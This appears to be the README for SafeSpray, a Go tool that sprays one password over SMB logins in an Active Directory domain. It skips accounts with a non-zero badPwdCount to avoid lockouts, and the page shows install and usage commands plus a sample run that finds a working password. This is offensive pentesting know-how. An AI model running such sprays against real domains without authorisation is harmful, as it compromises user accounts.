
An smb login password spray tool that prevents account lockouts by filtering all non-zero badPwdCount users

deadjakk/SafeSpray

SafeSpray

A simple SMB login password spraying tool written in Go that aims to prevent account lockouts.
Unlike other tools, it only performs password spraying on accounts that meet all of the following criteria:

  1. has a badPwdCount equal to 0
  2. has a username that is present in the file passed with the -userlist flag
  3. does not end in $ (usually computer accounts, though this check should never be hit since the tool only queries user objects)
  4. is not an account in ignoreArray (see the isIgnorable function)

To get this information, it queries all LDAP users at the time the password spray is performed, so a valid user account is needed (in most environments).
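The four criteria above, applied to a snapshot of directory entries, as an added Go example that is not SafeSpray's own code. The names Entry, ignored, skipReason and Select are hypothetical, the ignore list is a placeholder (the project's ignoreArray is not shown here), case-insensitive matching is an assumption, and the sample entries are constructed.

```go
package main

import (
	"fmt"
	"strings"
)

// Entry is one user object read from LDAP (type constructed for this example).
type Entry struct {
	SAMAccountName string
	BadPwdCount    int
}

// Placeholder ignore list; the project's real ignoreArray is not shown on the page.
var ignored = map[string]bool{"krbtgt": true, "guest": true}

// skipReason returns "" when an account meets all four criteria, else why it is excluded.
func skipReason(e Entry, wanted map[string]bool) string {
	name := strings.ToLower(e.SAMAccountName) // assumption: case-insensitive matching
	switch {
	case strings.HasSuffix(name, "$"):
		return "computer account"
	case ignored[name]:
		return "ignored account"
	case !wanted[name]:
		return "not present in user list"
	case e.BadPwdCount != 0:
		return fmt.Sprintf("badPwdCount is %d", e.BadPwdCount)
	}
	return ""
}

// Select returns the eligible account names and a skipped-name -> reason map.
// wanted holds the lower-cased usernames from the user list.
func Select(entries []Entry, wanted map[string]bool) (eligible []string, skipped map[string]string) {
	skipped = map[string]string{}
	for _, e := range entries {
		if r := skipReason(e, wanted); r != "" {
			skipped[e.SAMAccountName] = r
			continue
		}
		eligible = append(eligible, e.SAMAccountName)
	}
	return eligible, skipped
}

func main() {
	entries := []Entry{{"Administrator", 0}, {"carnivore", 0}, {"testuser", 1}, {"WS01$", 0}} // constructed
	fmt.Println(Select(entries, map[string]bool{"carnivore": true, "testuser": true}))
}
```

badPwdCount is not replicated between domain controllers, so the value read reflects only the DC that answered the LDAP query.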

Obviously this will not be applicable to all types of engagements, but it should work great on internal (non-stealth) pentesting engagements.

This way you really shouldn't need to worry about the password policy as long as it allows more than 1 failed login attempt.

All this said, test it on your own first; I am not responsible for account lockouts.

To install

go install github.com/deadjakk/safespray@latest

To Use

jakk@tele ~/spaf $ ./safespray -domain sprawl.local.shell.rip -password Password1 -spraypassword Password1 -userlist users.txt -username administrator -verbose
SKIPPED account (reason: not present in user list): Administrator
ADDED account: carnivore
loaded 1 users
SUCCESS - [email protected] with password Password1

Example usage

Usage of ./safespray:
  -authdomain string
    	(optional) valid domain to query ldap (if different from target domain)
  -dcip string
    	(optional) ip of the domain controller, optional, if excluded domain will be used as target instead
  -domain string
    	target domain name to authenticate and spray against
  -dryrun
    	(optional RECOMMENDED) will load the users and do nothing else. good to see what accounts will be run against
  -password string
    	valid password to query ldap
  -spraypassword string
    	password to spray
  -userlist string
    	path to the user file
  -username string
    	valid username to query ldap
  -verbose
    	(optional) enable verbose output

Note: These were both run in quick succession, and because the test account failed to authenticate on the first run, it was omitted from the second run due to the updated badPwdCount.